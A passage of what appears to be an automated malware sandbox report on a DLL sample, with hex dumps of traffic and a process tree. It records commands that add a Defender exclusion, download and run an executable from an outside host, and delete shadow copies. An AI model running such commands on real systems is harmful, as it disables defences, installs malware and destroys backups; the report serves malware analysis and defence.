                                                                                            2024-12-05 04:26:18 UTC16384INData Raw: 08 c7 45 fc 00 00 00 00 8d 4e 10 c7 06 9c c3 48 00 c7 46 0c 04 00 00 00 e8 c0 17 01 00 c7 06 4c cc 48 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c2 04 00 cc cc cc cc cc cc 55 8b ec 6a ff 68 4d 42 48 00 64 a1 00 00 00 00 50 51 56 a1 34 71 4b 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 f0 0f 57 c0 66 0f d6 46 04 ff 75 08 c7 45 fc 00 00 00 00 8d 4e 10 c7 06 9c c3 48 00 c7 46 0c 00 00 00 00 e8 50 17 01 00 c7 06 b4 c3 48 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c2 04 00 cc cc cc cc cc cc 55 8b ec 6a ff 68 4d 42 48 00 64 a1 00 00 00 00 50 51 56 a1 34 71 4b 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 f0 0f 57 c0 66 0f d6 46 04 ff 75 08 c7 45 fc 00 00 00 00 8d 4e 10 c7 06 9c c3 48 00 c7 46 0c 02 00 00 00 e8 e0 16 01 00 c7 06
                                                                                            Data Ascii: ENHFLHMdY^]UjhMBHdPQV4qK3PEduWfFuENHFPHMdY^]UjhMBHdPQV4qK3PEduWfFuENHF
                                                                                            2024-12-05 04:26:18 UTC16384INData Raw: 45 fc 02 00 00 00 50 8b cf e8 ef 02 00 00 8d 77 18 50 8b ce e8 04 d7 00 00 8b 95 a4 fe ff ff 83 fa 10 72 2f 8b 8d 90 fe ff ff 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 9a 02 00 00 52 51 e8 68 4e 05 00 83 c4 08 83 7e 14 10 72 02 8b 36 ff 77 28 8b 85 00 ff ff ff 8d 8d 00 ff ff ff 56 ff 50 10 8d 45 cc 50 8b 85 00 ff ff ff 8d 8d 00 ff ff ff ff 50 18 6a 4c 8d 85 b0 fe ff ff 6a 00 50 e8 cc 6b 05 00 83 c4 0c c7 85 90 fe ff ff 00 00 00 00 8d 8d 90 fe ff ff c7 85 a0 fe ff ff 00 00 00 00 c7 85 a4 fe ff ff 0f 00 00 00 c6 85 90 fe ff ff 00 6a 00 68 5b 47 4a 00 e8 a2 fb 00 00 c6 45 fc 03 8d 8d 74 fe ff ff 6a 01 c7 85 74 fe ff ff 00 00 00 00 68 bc 4c 4a 00 c7 85 84 fe ff ff 00 00 00 00 c7 85 88 fe ff ff 0f 00 00 00 c6 85 74 fe ff
                                                                                            Data Ascii: EPwPr/BrI#+RQhN~r6w(VPEPPjLjPkjh[GJEtjthLJt
                                                                                            2024-12-05 04:26:18 UTC16384INData Raw: 8d 14 fb ff ff 8b 85 00 fb ff ff 47 57 89 bd 48 e7 ff ff 8b 40 04 03 c8 8b 01 25 ff f9 ff ff 0d 00 08 00 00 89 01 8d 8d 00 fb ff ff e8 ec 91 00 00 8d 45 b8 50 8d 8d f0 fa ff ff e8 1d 64 00 00 6a 5c 8d 85 88 fe ff ff c6 45 fc 0e 6a 00 50 e8 09 2c 05 00 83 c4 0c 8d 8d 88 fe ff ff e8 6b 52 00 00 c7 85 70 ff ff ff 00 00 00 00 c7 45 80 00 00 00 00 c7 45 84 0f 00 00 00 c6 85 70 ff ff ff 00 c6 45 fc 10 8b 8d 90 fe ff ff ff 35 00 70 4b 00 6a 10 8b 01 ff b5 24 ff ff ff ff 50 18 8d 8d 88 fe ff ff e8 b4 41 03 00 6a 78 e8 87 0b 05 00 8b f8 83 c4 04 89 bd 44 e7 ff ff 6a 78 6a 00 57 c6 45 fc 11 e8 94 2b 05 00 83 c4 0c 6a 10 e8 64 0b 05 00 8b f0 83 c4 04 89 b5 50 e7 ff ff 0f 57 c0 c6 45 fc 12 6a 00 8b ce 0f 11 06 e8 6c 50 01 00 8d 85 70 ff ff ff c7 06 18 ed 48 00 c7 46
                                                                                            Data Ascii: GWH@%EPdj\EjP,kRpEEpE5pKj$PAjxDjxjWE+jdPWEjlPpHF
                                                                                            2024-12-05 04:26:18 UTC16384INData Raw: 8d 8d 88 fe ff ff e8 e2 55 00 00 8d 85 88 fe ff ff c6 45 fc 2c 50 8d 4d e4 e8 5f 0d 00 00 8d 8d 88 fe ff ff c6 45 fc 13 e8 60 55 00 00 68 a8 64 4a 00 8d 8d 88 fe ff ff e8 b0 55 00 00 8d 85 88 fe ff ff c6 45 fc 2d 50 8d 4d e4 e8 2d 0d 00 00 8d 8d 88 fe ff ff c6 45 fc 13 e8 2e 55 00 00 8d 4d e4 33 f6 e8 f4 0c 00 00 85 c0 74 6b ba b0 64 4a 00 b9 48 df 4b 00 e8 e1 96 00 00 50 e8 fb 9e 00 00 83 ec 14 8d 45 9c 8b cc 89 a5 84 fe ff ff 50 e8 47 57 00 00 83 ec 40 c6 45 fc 2e 8b cc 8d 85 fc fe ff ff 6a 01 50 e8 d0 8b ff ff 56 8d 4d e4 e8 87 0c 00 00 8b c8 e8 c0 54 00 00 8b c8 c6 45 fc 13 e8 95 d3 ff ff 83 c4 58 8d 4d e4 46 e8 89 0c 00 00 3b f0 72 95 8d 8d a0 fe ff ff e8 7a 00 00 00 8d 4d b4 e8 f2 0b 00 00 8d 4d 84 e8 9a 54 00 00 8d 8d 6c ff ff ff e8 8f 54 00 00 8d
                                                                                            Data Ascii: UE,PM_E`UhdJUE-PM-E.UM3tkdJHKPEPGW@E.jPVMTEXMF;rzMMTlT
                                                                                            2024-12-05 04:26:18 UTC16384INData Raw: 7c 72 8b 5d 0c 7f 04 85 db 74 69 c6 45 fc 02 50 8b 06 53 ff 75 08 8b 48 04 8b 4c 31 38 e8 8b 35 00 00 89 46 08 89 56 0c 3b c3 75 05 3b 55 10 74 3c bf 03 00 00 00 eb 35 8b 4d ec 6a 01 8b 01 8b 70 04 b8 04 00 00 00 03 f1 33 c9 8b 56 0c 83 ca 04 39 4e 38 0f 45 c1 8b ce 0b c2 50 e8 7c d7 fe ff b8 6a 4b 41 00 c3 8b 75 ec 8b 7d e8 c7 45 fc 01 00 00 00 8b 06 6a 00 8b 48 04 b8 04 00 00 00 03 ce 8b 51 0c 0b d7 33 ff 39 79 38 0f 45 c7 0b c2 50 e8 46 d7 fe ff c7 45 fc 04 00 00 00 8b 06 8b 40 04 8b 4c 30 38 85 c9 74 05 8b 01 ff 50 08 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc 8b 41 e8 8b 40 04 c7 44 08 e8 dc 6d 4a 00 8b 41 e8 8b 50 04 8d 42 e8 89 44 0a e4 c3 cc cc cc cc 55 8b ec 83 e4 f8 83 ec 1c 8b 45 10 53 8b 5d 0c 03 5d
                                                                                            Data Ascii: |r]tiEPSuHL185FV;u;Ut<5Mjp3V9N8EP|jKAu}EjHQ39y8EPFE@L08tPMdY_^[]A@DmJAPBDUES]]
                                                                                            2024-12-05 04:26:18 UTC16384INData Raw: 0c 8b 75 14 83 f8 ff 75 04 c6 45 10 01 83 ef 01 75 bb 8b 45 fc 5b 8b 4d 10 5f 89 70 04 89 08 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 8b 45 0c 53 8b 5d 18 56 8b 75 14 57 8b 7d 1c 89 45 f8 85 ff 74 55 0f 1f 40 00 85 f6 74 40 8b 46 20 8a 0b 88 4d ff 83 38 00 74 20 8b 56 30 8b 02 85 c0 7e 17 48 89 02 8b 4e 20 8b 11 8d 42 01 89 01 8a 45 ff 88 02 0f b6 c0 eb 0b 8b 16 0f b6 c1 8b ce 50 ff 52 0c 8b 75 14 83 f8 ff 75 04 c6 45 10 01 43 83 ef 01 75 b2 8b 45 f8 8b 4d 10 5f 89 70 04 5e 89 08 5b 8b e5 5d c3 55 8b ec 6a ff 68 55 64 48 00 64 a1 00 00 00 00 50 83 ec 4c a1 34 71 4b 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 7d 24 8b 45 0c 8b 4d 18 8b 5d 20 89 45 a8 89 4d ac 85 ff 74 11 8a 03 3c 2b 74 04 3c 2d 75 07 be 01 00 00 00 eb 02
                                                                                            Data Ascii: uuEuE[M_p^]UES]VuW}EtU@t@F M8t V0~HN BEPRuuECuEM_p^[]UjhUdHdPL4qK3ESVWPEd}$EM] EMt<+t<-u
                                                                                            2024-12-05 04:26:18 UTC16384INData Raw: 8b c3 5f 5e 5b 8b e5 5d c2 0c 00 8b 45 fc 2b c8 3b d1 77 59 0f 10 07 40 50 0f 11 03 f3 0f 7e 47 10 66 0f d6 43 10 c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 8b 3b 57 8d 04 17 50 e8 9a 26 04 00 83 c4 0c 83 7e 14 10 72 02 8b 36 8b 4d f4 51 56 57 e8 84 26 04 00 8b 45 f8 83 c4 0c 89 43 10 8b c3 5f 5e 5b 8b e5 5d c2 0c 00 b8 ff ff ff 7f 2b c2 3b 45 fc 0f 82 c0 00 00 00 8b 45 f8 83 c8 0f 3d ff ff ff 7f 76 07 b8 ff ff ff 7f eb 0a b9 16 00 00 00 3b c1 0f 42 c1 33 c9 89 45 ec 83 c0 01 0f 92 c1 f7 d9 0b c8 81 f9 00 10 00 00 72 26 8d 41 23 3b c1 0f 86 85 00 00 00 50 e8 74 0b 04 00 83 c4 04 85 c0 74 7d 8b 55 f4 8d 48 23 83 e1 e0 89 41 fc eb 19 85 c9 74 13 51 e8 55 0b 04 00 8b 55 f4 83 c4 04 8b c8 89 45 f0 eb 05 33 c9 89 4d f0 8b 45 f8 89 43 10 8b 45 ec 89 0b
                                                                                            Data Ascii: _^[]E+;wY@P~GfCGG;WP&~r6MQVW&EC_^[]+;EE=v;B3Er&A#;Ptt}UH#AtQUUE3MECE
                                                                                            2024-12-05 04:26:18 UTC16384INData Raw: 8b 4d ec 8b f0 ff 75 d4 8b 3e e8 7e 09 00 00 50 ff 75 f0 8b ce ff 75 e8 ff 57 10 8b 55 c8 39 55 c4 8b 75 cc 8b fe 0f 42 55 c4 33 c0 c6 45 fc 0d 8b ca f3 ab 56 85 d2 74 07 e8 ff a3 02 00 eb 05 e8 68 a4 02 00 83 c4 04 8b 55 f0 32 c0 8b fa c7 45 fc 0e 00 00 00 8b cb f3 aa 52 e8 4d a4 02 00 8b 45 e8 83 c4 04 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 8d e8 00 00 00 33 cd e8 8e c9 03 00 8d a5 ec 00 00 00 5d c2 18 00 8b 03 6a 0a ff 50 10 50 8d 85 d0 00 00 00 50 e8 2e f7 ff ff 8b f8 6a 0a 8d 85 90 00 00 00 c7 45 fc 00 00 00 00 56 50 e8 16 f7 ff ff 83 c4 18 8b f0 8b 43 04 8d 4b 04 8d 55 78 c6 45 fc 01 52 ff 50 08 68 b0 cb 48 00 50 8d 45 60 c6 45 fc 02 50 e8 5d 9a ff ff 56 50 8d 45 48 c6 45 fc 03 50 e8 9e 9a ff ff 68 88 cb 48 00 50 8d 45 30 c6 45 fc 04 50 e8 3b
                                                                                            Data Ascii: Mu>~PuuWU9UuBU3EVthU2ERMEMdY_^[3]jPPP.jEVPCKUxERPhHPE`EP]VPEHEPhHPE0EP;
                                                                                            2024-12-05 04:26:18 UTC16384INData Raw: 88 5f 08 8b 75 08 8b ce 57 c6 45 fc 00 e8 ab e9 01 00 8b 4d e8 c7 45 fc 03 00 00 00 85 c9 74 06 8b 11 6a 01 ff 12 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc 56 8b f1 e8 e8 11 fe ff f6 44 24 08 01 74 0b 6a 14 56 e8 64 8e 03 00 83 c4 08 8b c6 5e c2 04 00 f6 44 24 04 01 56 8b f1 c7 06 7c cc 48 00 74 0b 6a 0c 56 e8 43 8e 03 00 83 c4 08 8b c6 5e c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 57 68 18 82 4b 00 68 30 7c 4b 00 8b f1 e8 e6 a2 03 00 8b 7c 24 1c 83 c4 08 85 c0 75 15 8d 46 10 50 57 ff 74 24 18 e8 14 29 00 00 83 c4 0c 84 c0 75 1a ff 74 24 10 68 2c 7c 4b 00 ff 74 24 14 e8 0b 04 fe ff 8a 46 10 83 c4 0c 88 07 5f 5e c2 0c 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 57 68 18 82 4b 00 68 20 7c 4b 00 8b f1 e8 86 a2 03
                                                                                            Data Ascii: _uWEMEtjMdY_^[]VD$tjVd^D$V|HtjVC^VWhKh0|K|$uFPWt$)ut$h,|Kt$F_^VWhKh |K


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.649734103.253.43.2484433568C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-05 04:26:17 UTC174OUTGET /seti/cnost5ty6y.cpl HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                            Host: fiatie.top
                                                                                            Connection: Keep-Alive
                                                                                            2024-12-05 04:26:18 UTC253INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.14.2
                                                                                            Date: Thu, 05 Dec 2024 04:26:17 GMT
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Length: 917440
                                                                                            Last-Modified: Sat, 30 Nov 2024 07:59:54 GMT
                                                                                            Connection: close
                                                                                            ETag: "674ac5fa-dffc0"
                                                                                            Accept-Ranges: bytes
                                                                                            2024-12-05 04:26:18 UTC16131INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 59 59 bc bb 1d 38 d2 e8 1d 38 d2 e8 1d 38 d2 e8 46 50 d1 e9 0f 38 d2 e8 46 50 d7 e9 a7 38 d2 e8 46 50 d6 e9 0a 38 d2 e8 4f 4d d6 e9 0c 38 d2 e8 4f 4d d1 e9 05 38 d2 e8 4f 4d d7 e9 42 38 d2 e8 d7 4d d7 e9 34 38 d2 e8 46 50 d4 e9 1c 38 d2 e8 46 50 d3 e9 12 38 d2 e8 1d 38 d3 e8 b0 38 d2 e8 d7 4d db e9 1c 38 d2 e8 d7 4d 2d e8 1c 38 d2 e8 1d 38 45 e8 1c 38 d2 e8 d7 4d d0 e9 1c 38 d2
                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$YY888FP8FP8FP8OM8OM8OMB8M48FP8FP888M8M-88E8M8


                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:23:26:03
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\loaddll32.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:loaddll32.exe "C:\Users\user\Desktop\R7bv9d6gTH.dll"
                                                                                            Imagebase:0xf90000
                                                                                            File size:126'464 bytes
                                                                                            MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:1
                                                                                            Start time:23:26:03
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:23:26:03
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\R7bv9d6gTH.dll",#1
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:23:26:03
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\R7bv9d6gTH.dll",#1
                                                                                            Imagebase:0xe90000
                                                                                            File size:61'440 bytes
                                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:23:26:08
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:23:26:09
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
                                                                                            Imagebase:0x500000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:7
                                                                                            Start time:23:26:09
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:8
                                                                                            Start time:23:26:09
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:9
                                                                                            Start time:23:26:09
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
                                                                                            Imagebase:0x500000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:10
                                                                                            Start time:23:26:11
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                            Imagebase:0x7ff717f30000
                                                                                            File size:496'640 bytes
                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:11
                                                                                            Start time:23:26:13
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd /c powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:12
                                                                                            Start time:23:26:13
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd /c powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:13
                                                                                            Start time:23:26:13
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe
                                                                                            Imagebase:0x500000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:14
                                                                                            Start time:23:26:13
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:15
                                                                                            Start time:23:26:13
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe
                                                                                            Imagebase:0x500000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:16
                                                                                            Start time:23:26:17
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd /c %temp%/t5y6t5.exe
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:17
                                                                                            Start time:23:26:19
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd /c %temp%/t5y6t5.exe
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:18
                                                                                            Start time:23:26:19
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:19
                                                                                            Start time:23:26:19
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\AppData\Local\Temp/t5y6t5.exe
                                                                                            Imagebase:0x5b0000
                                                                                            File size:917'440 bytes
                                                                                            MD5 hash:616EDCD99B6C4FE02E25D31AE57C087C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:21
                                                                                            Start time:23:26:24
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\DydbAY\Dydb\..\..\Windows\Dydb\Dydb\..\..\system32\Dydb\Dydb\..\..\wbem\Dydb\DydbA\..\..\wmic.exe shadowcopy delete
                                                                                            Imagebase:0x7ff7934f0000
                                                                                            File size:576'000 bytes
                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:22
                                                                                            Start time:23:26:24
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:27
                                                                                            Start time:23:26:33
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\t5y6t5.exe"
                                                                                            Imagebase:0x5b0000
                                                                                            File size:917'440 bytes
                                                                                            MD5 hash:616EDCD99B6C4FE02E25D31AE57C087C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:28
                                                                                            Start time:23:26:38
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\MUSKjq\MUSK\..\..\Windows\MUSK\MUSK\..\..\system32\MUSK\MUSK\..\..\wbem\MUSK\MUSKj\..\..\wmic.exe shadowcopy delete
                                                                                            Imagebase:0x7ff603cb0000
                                                                                            File size:576'000 bytes
                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:29
                                                                                            Start time:23:26:38
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:30
                                                                                            Start time:23:26:41
                                                                                            Start date:04/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            Wow64 process (32bit):true
